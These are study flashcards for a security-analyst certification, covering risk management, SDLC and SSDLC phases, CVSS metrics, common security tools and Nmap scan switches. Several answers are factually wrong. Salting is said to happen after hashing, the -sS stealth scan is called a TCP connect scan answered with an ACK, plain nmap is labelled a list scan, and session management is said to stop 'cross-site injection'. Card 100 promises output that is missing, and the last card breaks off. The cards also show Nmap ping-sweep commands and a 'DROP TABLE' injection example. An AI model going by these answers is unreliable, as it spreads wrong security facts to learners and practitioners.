2. Vulnerability Types and Concepts Flashcards

1
Q

When assessing the steps to take to protect a system, which of the following should guide your selection of measures?

A)Exploitability of the system

B)Level of difficulty in mounting an attack

C)Asset value

D)Potential for weaponization of the system

A

When performing risk analysis with regard to protecting a system, asset value (which encompasses the value of the data it holds) should guide the selection of countermeasures or controls to be implemented. The cost of controls should never exceed the cost of suffering a successful attack.

The exploitability of the system, the level of difficulty in mounting a successful attack, and the likelihood that the system could be potentially weaponized are all important considerations, but these factors do not outweigh the cost of the controls versus the projected impact of the risk.

2
Q

Which of the following cryptographic attacks can be mitigated by salting the password?

A)brute force
B)known plaintext
C)pass the hash
D)side channel

A

A brute-force attack attempts to discover the key that was used to encrypt the data. This attack can be made easier when a rainbow table is used. This is a table of possible key values and their corresponding hash values. By using this table, the hacker eliminates one of the steps in cracking the key, thereby speeding up the process of decrypting the data. This attack can be mitigated by adding a random value to the key after it has been hashed, a process called salting the password.

3
Q

What is a known-plaintext attack?

A

A known-plaintext attack is one in which the attacker holds several matching samples of plaintext and ciphertext. Using these samples, the attacker tries to identify the encryption key that was used to encrypt the text. After determining the key, the attacker can convert the rest of the ciphertext into plaintext by using the same key.

4
Q

What is pass the hash?

A

Pass the hash (PtH) is an attack in which an adversary obtains a “hashed” user credential and uses it to create a new user session on the same network.

5
Q

Side-channel attack?

A

In a side-channel attack, the hacker attempts to discover information helpful to cracking the key by observing timing information, power consumption, electromagnetic leaks, and sounds made during the processing.

6
Q

Your team has arrived at a set of security configurations and applied them to the appropriate machines using a Group Policy object. Later, at regular intervals, the systems will be scanned to ensure the organization is still conforming to its requirement. Which of the following statements BEST describes the requirement it must meet?

A)CIS benchmark
B)security baseline
C)PCI-DSS
D)ISO 27000 series

A

When sets of security configurations are created, they are called security baselines. When you scan later to ensure compliance, you are performing baseline security scanning.

7
Q

CIS

A

While the security baseline you create might conform to an industry security standard, such as the Center for Internet Security (CIS) benchmark, there is no indication in the scenario that this is the case. A generic group of settings is called a security baseline. CIS benchmarks are prescriptive configuration recommendations for more than 25 vendor product families.

8
Q

ISO 27000 series

A

The ISO 27000 series comprises security standards published jointly by the ISO and the International Electrotechnical Commission (IEC).

9
Q

PCI DSS

A

The Payment Card Industry Data Security Standard (PCI DSS) is an information security standard for organizations that process credit card transactions or handle cardholder data from the major credit card vendors.

10
Q

You are negotiating with an IT service provider. You would like to ensure that your web server is able to maintain 99.99% uptime. This uptime is an expression of what?

A)Maintenance window
B)Maintenance exclusion
C)Responsive control
D)SLO

A

99.99% uptime is an expression of a service level objective (SLO). SLOs are the critical metrics within a Service Level Agreement (SLA) that a provider must meet for a client. Policies, governance, and SLOs are key components of attack surface management. SLOs begin with a service level indicator (SLI), which is the item for which performance or service is tracked. An example of an SLI could be server uptime – this is the item for which you want service tracked. The corresponding SLO would be expressed as a percentage: server uptime should be 99.99%.

11
Q

Maintenance Window

A

A maintenance window is a recurring period during which patches and configuration changes (maintenance) are performed. These maintenance windows are typically used for automatic patch deployment and configuration changes. When scheduling a maintenance window, it is important to consider the impact of downtime to the organization, customers, and operations.

12
Q

Maintenance Exclusion

A

A maintenance exclusion (or maintenance exception) is a timeframe or instance when maintenance would be prohibited. This could be the case when a legacy application cannot be updated. Another example of a maintenance exclusion could be a retail organization that forbids configuration changes during a peak sale period. The maintenance exception should be submitted as a request that is subsequently approved by the change management team.

13
Q

Responsive Controls

A

Responsive controls come into play after an event has been detected. Examples include a system reboot, activating a business continuity plan, isolating a virus to quarantine, and replacing smart access cards.

14
Q

Your organization’s management has recently spent time discussing attacks against companies and their infrastructures. During the meeting, the Stuxnet attack was discussed. Against which type of system did this attack occur?

A)Kerberos
B)SCADA
C)VoIP
D)RADIUS

A

The Stuxnet attack occurred against a Supervisory Control and Data Acquisition (SCADA) system. A SCADA system is also referred to as an industrial control system (ICS). SCADA is a category of software that gathers data in real time from remote locations to control equipment and conditions. It is used to monitor critical systems and control power distribution. In recent years, it has become even more vital to protect these systems. SCADA is used in the power, oil, telecommunications, gas refining, water treatment, nuclear facilities, and waste control industries.

15
Q

Kerberos and RADIUS

A

Kerberos is an authentication system that includes clients, servers, and a key distribution center (KDC). The KDC gives clients tickets that the clients use to access servers and other resources.

Remote Authentication Dial-In User Service (RADIUS) is a remote access technology that allows remote users to centrally sign on to access the resources on the local network.

16
Q

You are the security administrator for your company and have identified a security risk that cannot be corrected with in-house personnel. You decide to hire an outside contractor who will be responsible for handling and managing this security risk. Which risk management principle is being described?

A)Avoid
B)Transfer
C)Accept
D)Mitigate

A

The risk management principle of transfer (transference) is being described. Transference involves shifting the risk and its consequences to a third party who is then responsible for owning and managing the risk. Purchasing insurance is an example of transference.

17
Q

Risk management principles: Avoid

A

The avoid principle (avoidance) involves modifying the security plan to eliminate the risk or its impact. Examples of avoidance would include stopping a risky activity altogether, adding security resources to eliminate the risk, or removing resources to eliminate the risk.

18
Q

Risk management principles: Acceptance

A

The risk management principle of accept (acceptance) is when you acknowledge that a risk may occur, but do not change the security plan to prevent the risk. Examples of acceptance would include taking no action at all or developing a contingency or fallback plan. It is recommended that you accept a risk when the cost of the safeguard exceeds the amount of the potential loss.

19
Q

Risk management principles: Mitigate

A

The mitigate principle (mitigation) involves reducing the probability or impact of a risk to an acceptable risk threshold. To mitigate a risk, you would take actions to minimize the probability of the risk occurring. Biometric locks on a server room’s doors mitigate the risk of an intruder breaking in where sensitive data is housed.

20
Q

Which of the following would determine if safeguards that have been installed were properly implemented, performing as expected and producing the appropriate results?

A)Security controls testing
B)Bug bounty
C)Penetration testing and adversary emulation
D)Attack surface reduction

A

Security controls testing determines whether safeguards that have been installed are properly implemented, perform as expected, and produce the appropriate results. Security controls are grouped into three main categories: technical, administrative, and physical. For example, a test of a physical security control could be checking to see if an access control card denies entry into a specific area.

21
Q

Pen Testing

A

Penetration testing and adversary emulation are critical for attack surface management. The goal of penetration testing is to identify as many vulnerabilities as possible within defined time and scope parameters.

22
Q

Adversary or Threat emulation

A

Adversary emulation (also known as threat emulation) adopts current threat intelligence methodologies and tactics to identify, expose and correct vulnerabilities. Adversary emulation is particularly suited to measure the organization’s ability to withstand an attack from advanced persistent threats.

23
Q

Bug Bounty

A

A bug bounty is a reward for finding security flaws (bugs) in an application. Organizations will attract ethical hackers to find vulnerabilities. Once found, the ethical hackers are rewarded, often with some prestige or notoriety like being mentioned on a leaderboard. Finding and correcting vulnerabilities helps reduce the attack surface.

24
Q

Attack surface reduction

A

Attack surface reduction refers to hardening areas that are potential entry points, including cloud infrastructure. Examples of items that can be addressed include deleting unused accounts, closing unused ports, implementing the principle of least privilege, and removing hardware that is no longer used.

25
Q

Snort is one of the tools used by your company. What functionality does this tool provide?

A)IDS/IPS
B)Vulnerability scanner
C)Firewall
D)SIEM

A

Snort provides intrusion detection system (IDS) and intrusion prevention system (IPS) functionality, including logging and real-time traffic analysis.

26
Q

Which vendors provide firewall systems?

A

Cisco, Palo Alto, and Check Point. Firewalls can sometimes include other functionality, such as IDS and IPS functions.

27
Q

SIEM tools include?

A

SIEM tools include ArcSight, QRadar, Splunk, AlienVault, OSSIM, and Kiwi Syslog.

28
Q

Vulnerability Scanners include?

A

Vulnerability scanners include Qualys, Nessus, OpenVAS, Nexpose, Nikto, and Microsoft Baseline Security Analyzer. Regarding OpenVAS and Nikto, OpenVAS is a full-featured vulnerability scanner, while Nikto is best for vulnerability scanning of web servers and their files.

29
Q

After a number of unsuccessful attempts were made to attack your websites, your organization is looking to increase its knowledge about the latest threats to web applications. As part of this process, management has asked you to identify a list of the top 10 attacks and report these attacks on an ongoing basis. Which organization provides this information?

A)SANS
B)CIS
C)OWASP
D)ISO

A

The Open Web Application Security Project (OWASP) is a group that monitors attacks, specifically web attacks. OWASP maintains a list of the top 10 attacks on an ongoing basis. This group also holds regular meetings at chapters throughout the world, providing resources and tools including testing procedures, code review steps, and development guidelines.

30
Q

What is SANS?

A

The SysAdmin, Audit, Network, and Security (SANS) organization provides guidelines for secure software development and sponsors the Global Information Assurance Certification (GIAC). It also provides training, performs research, and publishes best practices for cybersecurity, web security, and application security.

31
Q

What is CIS used for?

A

The Center for Internet Security (CIS) is a not-for-profit organization known for compiling CIS Security Controls (CSC). From this research, they publish a list of the top 20 security controls. They also provide hardened system images, training, assessment tools, and consulting services.

32
Q

ISO

A

The International Organization for Standardization (ISO) develops and publishes international standards.

33
Q

Which of the following best practices would be the best application development tool to secure against SQL injection attacks?

A)Session management
B)Parameterized queries
C)Authentication
D)Data protection

A

Parameterized queries would be the best application development methodology to secure against SQL injection attacks. Parameterized queries allow you to use placeholders (parameters) instead of the actual input values. If a malicious user enters an SQL command into a text field, such as “DROP TABLE tablename”, the parameterized query does not interpret it as a command but treats it as plain data, in this case simply a bad email address.

34
Q

What can you use to protect from Cross-Site injection attacks?

A

Session management protects against cross-site injection attacks by creating a token. This is accomplished through the creation of a session identifier (session ID) that is exchanged between the user and the web application. Session IDs should be at least 128 bits and should contain sufficient random characters to prevent a brute force attack.

35
Q

Your organization recently deployed a commerce server in the cloud. They want to ensure that all requirements of PCI-DSS are implemented. Which open-source security tool contains hundreds of controls covering PCI-DSS requirements?

A)Immunity Debugger
B)Prowler
C)Maltego
D)Arachni

A

Prowler is an open-source tool used to perform best practices assessments and audits, with hundreds of controls covering PCI-DSS requirements.

36
Q

What is Immunity Debugger tool?

A

Immunity Debugger is not a cloud tool. It supports a Python-based API and allows for the writing of exploits, analysis of malware, and reverse engineering of binary files.

37
Q

Maltego

A

Maltego is not a cloud tool. It is a Java-based tool for discovering data from OSINT, private, and commercial data sources and visualizing that information in combined form in a graph format. The results can be used for link analysis and data mining.

38
Q

Arachni

A

Arachni is not a cloud tool, and it is not used for IP scanning. It is a high-performance Ruby framework aimed at helping penetration testers and administrators evaluate the security of modern web applications.

39
Q

What does nmap -sn do?

A

Running nmap -sn performs a host discovery scan, which enumerates all active hosts on the network.

40
Q

nmap -sn

A

(no port scan, also called a ping scan)

The Nmap tool (short for network mapper) is commonly used to perform port scans, OS identification, and version or banner grabbing against services. Its main use is to discover the status of port numbers and IP addresses. It is widely used by administrators for network management and monitoring, and by criminal hackers to discover and investigate attack targets. The -sn switch (also called a ping scan) is the most common switch and is used for host discovery. Note that this type of scan is noisy: it sends out packets for discovery, which adds traffic to the network and is visible in logs and in packet captures such as Wireshark.

41
Q

nmap

A

List scan

42
Q

nmap -Pn

A

no ping scan

43
Q

nmap -PS

A

port list TCP version

44
Q

nmap -PU

A

port list UDP version

45
Q

nmap -sS

A

stealth TCP connect scan

A stealth scan uses the -sS switch, which is one of the two TCP connect scans. (The -sT switch is the other.) A stealth scan is not as loud as a ping scan because it sends a single SYN packet to the port. If the port is open, it replies with an ACK, and an RST (reset) packet then tears the half-open connection down, leaving things quiet.

46
Q

nmap -sT

A

default TCP connect scan

47
Q

nmap (compliance)

A

Compliance scans, by their very nature, are interested in whatever compliance rules your company needs to follow. For instance, if you are a hospital or medical clinic, you need to be in compliance with HIPAA.

48
Q

Your organization is planning a vulnerability scan and would like to maintain an awareness of the possible contexts in which the scan is performed. In which context would the scan reveal the likelihood of an attack on the router directly attached to the Internet?

A)Segregated
B)External
C)Isolated
D)Internal

A

The context of a scan describes the position of the attacker when the scan (or subsequent attack) is performed. An external scan is performed from outside the network and simulates an attack on the device directly connected to the Internet.

49
Q

Internal vulnerability scan

A

An internal scan is one that is performed from inside the firewall and simulates an attack by an insider or by an attacker who has breached the external network.

50
Q

Isolated Vulnerability scan?

A

An isolated scan is one that is performed on a network or part of a network that is isolated from the Internet and perhaps from the internal network as well. A good example of this is a virtual network with no connection to the Internet or the internal network. This type of scan would probably require some type of internal assistance to the attacker, as the scan would require access to the isolated network.

51
Q

You have been tasked with upgrading the processes in the software development life cycle (SDLC) to the secure SDLC (SSDLC). What would you incorporate into the Planning and Requirements phase of the SDLC to make that section secure?

A)Threat modeling
B)Gap analysis
C)Secure coding
D)Unit testing

A

In the Planning and Security Requirements phase of the SSDLC, you would add gap analysis. Gap analysis identifies missing security elements and allows for these elements to be included in the development process. Adding gap analysis to the Planning and Requirements phase of the SDLC creates the Planning and Security Requirements phase of the SSDLC.

52
Q

What would you add to the Design phase of the SDLC to turn it into the prototyping phase of the SSDLC?

A

Threat modeling would be added to the Design phase of the SDLC, becoming the Secure Design and Prototyping phase of the SSDLC.

53
Q

What would you add to the Development phase of the SDLC to turn it into the corresponding SSDLC phase?

A

Secure coding would be added to the Development phase of the SDLC, becoming the Secure Development phase of the SSDLC.

54
Q

What is added to the Testing phase of the SDLC to produce the vulnerability testing phase of the SSDLC?

A

Unit testing would be added to the Testing phase of the SDLC, resulting in the Security and Vulnerability Testing phase of the SSDLC.

55
Q

Name the six SDLC phases.

A
  1. Planning and Requirements
  2. Design
  3. Development
  4. Testing
  5. Deployment
  6. Maintenance
56
Q

The corresponding phases of the secure software development lifecycle (SSDLC) process are:

A
  1. Planning and Security Requirements
  2. Secure Design and Prototyping
  3. Secure Development
  4. Security and Vulnerability Testing
  5. Secure Deployment
  6. Maintenance and Monitoring
57
Q

SDLC Phase Name: Planning and Requirements

How to migrate to SSDLC?

A

Gap Analysis

58
Q

SDLC Phase Name: Planning and Requirements

What is the Secure SDLC Phase Name?

A

Planning and Security Requirements

59
Q

SDLC Phase Name: Design

How to migrate to SSDLC?

A

Threat Modeling

60
Q

SDLC Phase Name: Design

What is the Secure SDLC Phase Name?

A

Secure Design and Prototyping

61
Q

SDLC Phase Name: Development

How to migrate to SSDLC?

A

Secure Coding

62
Q

SDLC Phase Name: Development

What is the Secure SDLC Phase Name?

A

Secure Development

63
Q

SDLC Phase Name: Testing

How to migrate to SSDLC?

A

Unit Testing

64
Q

SDLC Phase Name: Testing

What is the Secure SDLC Phase Name?

A

Security and Vulnerability Testing

65
Q

SDLC Phase Name: Deployment

How to migrate to SSDLC?

A

Build routine security tests

66
Q

SDLC Phase Name: Deployment

What is the Secure SDLC Phase Name?

A

Secure Deployment

67
Q

SDLC Phase Name: Maintenance

How to migrate to SSDLC?

A

Bug bounty program

68
Q

SDLC Phase Name: Maintenance

What is the Secure SDLC Phase Name?

A

Maintenance and Monitoring

69
Q

The software development team has started developing a new application. They are assigning a privacy impact rating to the data that will be handled and/or generated by the application. Which best practice prescribed by the SDLC model does this support?

A)security requirements definition
B)user acceptance testing
C)manual peer reviews
D)security testing phases

A

The process described in the scenario supports the security requirements definition. The security requirements of the solution must be identified. Assigning a privacy impact rating to the data helps to guide measures intended to protect the data from exposure.

Security testing phases are undertaken after security requirements have been defined, because only when the requirements have been defined can one know if they have been met.

In manual peer review, software developers attend meetings where each line of code is reviewed, usually using printed copies.

While it is important to make web applications secure, in some cases security features make the application unusable from the user perspective. User acceptance testing is designed to ensure that does not occur.

70
Q

Your team needs a tool that is an open-source and cross-platform network scanner designed to scan IP addresses and ports. Which of the following tools fits the bill?

A)Angry IP Scanner
B)GNU Debugger
C)Arachni
D)Maltego

A

Angry IP Scanner is an open-source and cross-platform network scanner designed to scan IP addresses and ports. It can scan IP addresses in any range as well as any of their ports. As a cybersecurity practitioner, you would use it to ensure that every open port is actually required; a hacker would use the same scan to find open ports to attack.

71
Q

Arachni

A

Arachni is not used for IP scanning. It is a high-performance Ruby framework aimed at helping penetration testers and administrators evaluate the security of modern web applications.

72
Q

What are three types of security controls? (Choose three.)

A)Acceptance
B)Preventative
C)Detective
D)Responsive

A

Three types of security controls are preventative controls, detective controls, and responsive controls.

Detective controls identify active security issues when they arise or find indicators of compromise. They include monitoring, job rotation, investigations, intrusion detection systems (IDSes), auditing, guards, and CCTV.

Responsive controls come into play after an event has been detected, and may be automated or preconfigured actions prepared in advance. Examples include a system reboot, activating a business continuity plan, isolating a virus to quarantine, and replacing smart access cards.

73
Q

Corrective controls?

A

Corrective – Restore normal operations after a security incident

74
Q

Managerial Controls

A

Managerial – Establish policies to decrease the chances of a security incident

75
Q

Operational Controls

A

Operational – Enact security policies with best practices and procedures

76
Q

Technical Controls

A

Technical – Implement hardware- and software-based tools to prevent security incidents

77
Q

You need to provide your company with a report regarding potential security-related software flaws. You need to use standardized names so that a security analyst contractor can understand the report. Which SCAP component should you use?

A)CVE
B)CVSS
C)CPE
D)CCE

A

You should use the Common Vulnerabilities and Exposures (CVE), which provides standardized names for security-related software flaws.

Keep in mind that you may need to provide reports on identified vulnerabilities to different audiences. While technical staff may be able to read and comprehend the automatic reports generated by a vulnerability scanner, you may need to create an executive report for other non-technical staff that contains information that is more easily understood.

While having the vulnerability scanner deliver reports automatically may be preferred, it is not the best solution. Understanding automated versus manual distribution issues will ensure that you, as the security analyst, can provide your audience with information they need and understand. Automatic distribution distributes the reports automatically through internal mechanisms, often via email. Manual distribution would require more effort on the security analyst to ensure that the appropriate individuals receive the correct report.

78
Q

Your organization has implemented a cloud solution and is seeking a tool that could be used to perform security auditing on their environment. Which of the following is such a tool?

A)Scout Suite
B)Metasploit
C)Recon-ng
D)GNU debugger

A

Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection, highlights risk areas, and presents a clear view of the attack surface automatically.

79
Q

What is GDB?

A

The GNU Project Debugger (GDB) is not a cloud tool. It is a widely popular program debugger with many features, such as the ability to discover what a program was doing when it crashed.

80
Q

Metasploit

A

Metasploit is not a cloud tool, but a framework used in penetration testing that probes systematic vulnerabilities on networks and servers.

81
Q

Recon-ng

A

Recon-ng is not a cloud tool. It comes with Kali Linux and automates the information gathering of open-source intelligence (OSINT).

82
Q

You have a legacy application that should not be patched in the next update cycle. What should you request?

A)Maintenance window
B)Maintenance exclusion
C)Escalation
D)Service level objective

A

A maintenance exclusion (or maintenance exception) is a timeframe or instance when maintenance would be prohibited. This could be the case when a legacy application cannot be updated. Another example of a maintenance exclusion is a retail organization that forbids configuration changes during a peak sale period. The maintenance exception should be submitted as a request that is subsequently approved by the change management team.

83
Q

Escalation

A

Escalation is closely related to prioritization. It is important that an organization has a prioritization and escalation policy. When an incident occurs, it is important to assign it a priority level. The priority level determines the order in which the incident is addressed. In addition, the priority level is usually associated with the team or individual within the organization that is tasked with handling that incident level. If the situation changes, conditions deteriorate, or the effects of an event spread, the priority level can be changed, allowing for escalation to another team.

A perfect example of prioritization and escalation exists in the medical community. For example, a bus carrying many passengers has crashed. First responders assign a priority level to each passenger according to the severity of their injuries. Those who can be treated at the scene are assigned a lower priority than those who must be transported to the hospital via ambulance. If a patient who is waiting for ambulance transport develops a life-threatening complication, that patient’s priority can be escalated for air transport.

84
Q

SLO

A

Service level objectives (SLOs) are the critical metrics within a Service Level Agreement (SLA) that a provider must meet for a client. Policies, governance, and SLOs are key components of attack surface management. SLOs begin with a service level indicator (SLI), which is the item for which performance or service is tracked. An example of an SLI could be server uptime – this is the item for which you want service tracked. The corresponding SLO would be expressed as a percentage, such as a desired server uptime of 99.99%.

85
Q

During a penetration testing planning session, the organization decided to use CVSS scores to help determine the criticality of any discovered vulnerabilities. Which of these metric groups does NOT receive a score in the CVSS system?

A)Environmental
B)Base
C)Temporal
D)Security

A

There is no Security metric group in the CVSS system. CVSS v3.1 defines three metric groups: Base, Temporal, and Environmental.

86
Q

What are the three CVSS metric groups scores used?

A

Base group: represents characteristics of a vulnerability that are constant over time and do not depend on the environment. These metrics are mandatory for scoring.

Temporal group: assesses a vulnerability as it changes over time. These metrics are optional for scoring.

Environmental group: represents the characteristics of a vulnerability, taking into account the organizational environment. These metrics are optional for scoring.

87
Q

Which of the following is a Microsoft threat-modeling tool?

A)STIX
B)CVSS
C)T-MAP
D)STRIDE

A

STRIDE is an example of a threat-modeling framework. It was developed at Microsoft to identify a wide variety of threats. STRIDE is an acronym for the six threat categories it identifies:

Spoofing identities
Tampering with data
Repudiation
Information disclosure
Denial of service
Elevation of privilege

88
Q

STIX

A

Structured Threat Information Expression (STIX) is an open standard language and serialization format (maintained by OASIS) for exchanging threat intelligence among interested parties. For example, if a major retailer discovered a threat linked to supply chain management, it might communicate the threat information to its suppliers using STIX.

89
Q

Tom is analyzing the results of a vulnerability scan and is examining a vulnerability detected on one of his servers that has a CVSS breakdown as follows:

CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N

Which one of the following describes the attack complexity score in this breakdown?

A)The attacker can expect repeatable success when attacking the vulnerable component.

B)The attacker must inject themselves into the logical network path between the target and the resource requested by the victim in order to read and/or modify network communications.

C)The attacker must gather knowledge about the environment in which the vulnerable target/component exists.

D)The attacker must prepare the target environment to improve exploit reliability.

A

An attacker can expect repeatable success when attacking the vulnerable component because the Attack Complexity (AC) metric has a value of L, which stands for Low. (CVSS v2 called this metric Access Complexity; CVSS v3.x renamed it Attack Complexity.) The AC metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. It has two possible values:

H – stands for High and means the vulnerability requires special conditions that are hard to find.

L – stands for Low and means the vulnerability does not require special conditions.

When the AC score is High, the attack requires at least one of the following conditions to succeed:

The attacker must gather knowledge about the environment in which the vulnerable target/component exists, for example, a requirement to collect details on target configuration settings, sequence numbers, or shared secrets.

The attacker must prepare the target environment to improve exploit reliability, for example, repeated exploitation to win a race condition, or overcoming advanced exploit mitigation techniques.

The attacker must inject themselves into the logical network path between the target and the resource requested by the victim in order to read and/or modify network communications (e.g., a man in the middle attack).

90
Q

Your web server’s files and directories were recently spidered, revealing a security issue of which a hacker took advantage. You need a server analysis tool that can index all of the files and directories, commonly known as spidering. Which of the following tools would be best suited for this?

A)Zenmap
B)Nessus
C)Nikto
D)Burp Suite

A

Nikto is an open-source web server analysis tool and vulnerability scanner. It indexes the files and directories on the target web server (spidering) and locates and reports any potential issues it finds, such as dangerous files, outdated server software, and misconfigurations.

91
Q

Burp Suite

A

Burp Suite is a collection of web application security tools that includes proxy capabilities and mobile application testing to determine communication with application programming interfaces (APIs) and to discover vulnerabilities in web apps.

92
Q

Zenmap

A

Zenmap is the graphical user interface (GUI) version of the Nmap Security Scanner. Zenmap is a free and open-source program designed to make Nmap easier for beginners to learn and use, but it also provides features that are extremely useful for experienced Nmap users. It can be used to determine the differences between multiple Nmap scans, such as two Nmap scans run on different days.

93
Q

Nessus

A

Nessus is a scanning tool for remote security that scans a device or network of devices and raises an alert if it comes across any vulnerabilities that malicious hackers could use to get into your network and cause damage.

94
Q

After completing a vulnerability scan, John received a report that no vulnerabilities existed on a Windows workstation. Later, John discovered that the workstation had a vulnerability in the operating system that was not caught. What type of error occurred?

A)False positive
B)True negative
C)True positive
D)False negative

A

The type of error that occurred is a false negative. The vulnerability scan indicated no vulnerabilities existed when, in fact, one was present.

Security analysts should analyze reports from a vulnerability scan. This involves reviewing and interpreting scan results. As a result, security analysts need to identify false positives, identify exceptions, and prioritize response actions.

95
Q

True Negative

A

A true negative is when a vulnerability scan reports no issue and no issue exists.

96
Q

True Positive

A

A true positive is when a vulnerability scan reports a vulnerability that does exist.

97
Q

False Positive

A

A false positive is when a vulnerability scan reports a vulnerability that does not exist.

98
Q

The software development team is adopting the best practices of the software development life cycle. They need to prevent buffer overflow attacks. Which of the following should they deploy?

A)Manual peer reviews
B)Input validation
C)Security requirements definition
D)Security testing

A

Input validation ensures that all input is checked for the proper length. Validating input for length helps prevent buffer overflow attacks because buffer overflows present more input than was expected, overflowing the memory reserved for the input.

99
Q

The other best practices of the SDLC include?

A

The other best practices of the Software Development Life Cycle (SDLC) include:

Security testing phases – including static code analysis, web application vulnerability scanning, and fuzz testing to identify vulnerabilities.
User acceptance testing – designed to ensure security features do not make the application unusable from the user perspective.
Stress test application – determines the workload that the application can withstand.
Security regression testing – validates that changes have not reduced the security of the application, nor opened new weaknesses that were not there prior to the change.

100
Q

Your assistant just executed the following Nmap command:

$ nmap -sn 192.168.0.1-254

What is the best description of this scan type?

A)external scan
B)internal scan
C)device fingerprint
D)map scan

A

The nmap -sn command executes a ping sweep, which identifies all live devices and so is also called a map scan, ping scan, or host discovery scan. The -sn switch (formerly -sP) performs host discovery only and does not scan ports. Sample output of this scan is shown below:

101
Q

nmap -sn 192.168.0.1-254 -O

A

While the command $ nmap -sn 192.168.0.1-254 only identifies the live devices and their IP addresses, a device fingerprint identifies the operating system and its version. Obtaining this information requires adding the -O switch, which enables operating system detection.

102
Q

You are working with a new security analyst on a recent non-credentialed Nessus vulnerability scan. You need to document the number of devices that are impacted by a particular vulnerability. The new security analyst does not know how to obtain this information. Which of the following should you instruct the analyst to obtain?

A)Vulnerabilities Grouped by Plugin
B)Suggested Remediations
C)Vulnerabilities Grouped by Host
D)Credentialed scan

A

You should instruct the new security analyst to obtain the Vulnerabilities Grouped by Plugin subset of the current scan. This is available from the main report in Nessus. A plugin is a simple program that checks for a given flaw.

You should not instruct the analyst to obtain Vulnerabilities Grouped by Host subset of the current scan. This will list the vulnerabilities for a given host.

You should not instruct the analyst to obtain the Suggested Remediations subset of the current scan. It summarizes the actions to take that address the largest quantity of vulnerabilities on the network.

You should not instruct the analyst to obtain a Credentialed scan. You can obtain the information you need from the current non-credentialed scan.

103
Q

A consultant has pointed out that the firewall protecting the internal network is allowing the 192.168.5.0/16 network rather than the 192.168.5.0/8 network as the implementation document specifies. In which category of issues should this discovery be recorded?

A)insecure design
B)security misconfiguration
C)identification and authentication failure
D)end-of-life or outdated component

A

Since the implementation document specifies a desired setting at variance with the actual setting that exists on the device, this is a security misconfiguration.

This is not an example of insecure design. There is no indication that the desired configuration in the design document is incorrect or insecure.

This is not an issue with its roots in an end-of-life or outdated component. An example of that would be if the consultant discovered that the router was so old that the vendor no longer provided support for it.

This is not an issue in the category of identification and authentication failure. An example of this would be if the consultant discovered that the router allowed them to log on as administrator when that should not be allowed.

104
Q

Users have been complaining about a program constantly crashing. What tool would you use to find information as to why the crashes occur?

A)Metasploit framework
B)GDB
C)Recon-ng
D)Immunity Debugger

A

The GNU Project Debugger (GDB) is a widely popular debugger with many features. With this program, you can discover what a program was doing when it crashed.

105
Q

Metasploit Framework?

A

Metasploit Framework (MSF) is a penetration-testing framework used to probe networks and servers for known vulnerabilities and to exploit them. It would not help determine why the application crashes occur.

106
Q

The Immunity Debugger

A

The Immunity Debugger is a Windows debugger that exposes a Python-based API. It supports the writing of exploits, analysis of malware, and reverse engineering of binary files. It would not help determine why the crashes occur.

107
Q

Which of the following patching and configuration management concepts should be implemented first when a new patch is issued or a configuration change is necessary?

A)Implementation
B)Testing
C)Rollback
D)Validation

A

Your first step would be to implement testing when a new patch is issued or a configuration change is necessary. Regarding new patches, it would be impossible for a publisher to account for every possible environment in which a patch will be deployed. Therefore, you should install and test new patches and configuration changes on isolated equipment. If the change fails, the effects are localized and not catastrophic to the organization.

Validation checks are performed after the patch is installed or the configuration change is made to see if it is performing as it should. Did the configuration change perform as claimed, or did it introduce unforeseen errors elsewhere in the system?

Implementation is the deployment or activation of the patch or configuration change. Implementation should follow a standardized plan with a series of steps in a checklist. As an example, one step in the implementation process could be to perform a system backup or create a system image.

Rollback returns the device or application to the state it was in prior to the patch or configuration change; in essence, rollback is an “undo”. It is highly recommended that you have a rollback plan established that allows you to restore the system to its prior state in the likely event that something goes wrong.

108
Q

Recently, it has become increasingly hard to manage all the event and audit logs generated by devices and servers on your company’s network. You need to deploy a solution that allows you to consolidate the logs for easier analysis. Which tool should you use?

A)MRTG
B)Splunk
C)Nexpose
D)Sysinternals

A

You should use Splunk to consolidate the logs for easier analysis. Splunk is a security information and event management (SIEM) tool. Other SIEM products include ArcSight, QRadar, and AlienVault OSSIM. Kiwi Syslog Server is a syslog collector that feeds logs to a SIEM rather than a SIEM in itself.

109
Q

Vulnerability Scanner tool?

A

Nexpose is a vulnerability scanning tool. Other vulnerability scanning tools include Qualys, Nessus, OpenVAS, Nikto, and Microsoft Baseline Security Analyzer (MBSA), which Microsoft has since retired.

110
Q

Sysinternals?

A

Sysinternals is a technical tool that includes resources and utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment.

111
Q

MRTG?

A

MRTG is an analytical monitoring tool to monitor the traffic load on network links. Other monitoring tools include Nagios, SolarWinds, Cacti, and NetFlow Analyzer.

112
Q

You have used Nessus to produce comprehensive vulnerability scan reports on all systems. Management specifically wants you to review the reports against Center for Internet Security (CIS) benchmarks. Which type of report should you review?

A)Non-credentialed network scan
B)Compliance audit
C)Credentialed network scan
D)Patch audit

A

You should review the compliance audit produced by Nessus. A compliance audit reports configuration findings measured against CIS benchmarks.

A patch audit compares systems and devices against the vendors' patch releases to determine whether the organization has failed to deploy available patches.

A credentialed network scan scans the network for vulnerabilities using credentials to ensure that all areas of the devices can be examined.

A non-credentialed network scan scans the network without credentials, so areas that require credentials for access will not be scanned.

113
Q

You have run a Nessus vulnerability scan on several Linux servers. When you receive the scan report, you suspect that there are several false positives on the report. What should you do FIRST?

A)Verify the false positives to ensure that you can eliminate them from the report.
B)Resolve the false positives in order based on their CVSS value.

C)Configure exceptions in Nessus for the false positives to ensure they are no longer reported.

D)Install the Nessus plug-ins to resolve the false positives.

A

You should first verify or validate the false positives to ensure that you can eliminate them from the report. While validation of false positives can be very time consuming, it is a necessary step to ensure that they are not true positives. Once they are verified, you can then configure exceptions for them.

114
Q

Which of the following can be defined as how an organization’s policies and procedures are designed to thwart, identify, and react to vulnerabilities and attacks?

A)Risk management principles
B)Governance
C)Threat modeling
D)Compensating controls

A

Governance can be defined as how an organization’s policies and procedures are designed to thwart, identify, and react to vulnerabilities and attacks. While risk management is a component of governance, governance is an overall view that aligns legal aspects, requirements of privacy protection, and risk to the enterprise.

115
Q

Risk Management Principles?

A

Risk management principles include acceptance, transference, avoidance, and mitigation.

116
Q

STRIDE

A

Threat modeling is part of the Secure Design and Prototyping stage of the secure software development life cycle (SSDLC). This process tries to identify security risks inherent in the application being developed. One example of a threat modeling framework is STRIDE, which was developed at Microsoft to identify a wide variety of potential threats. STRIDE is an acronym for the six threat categories it identifies:

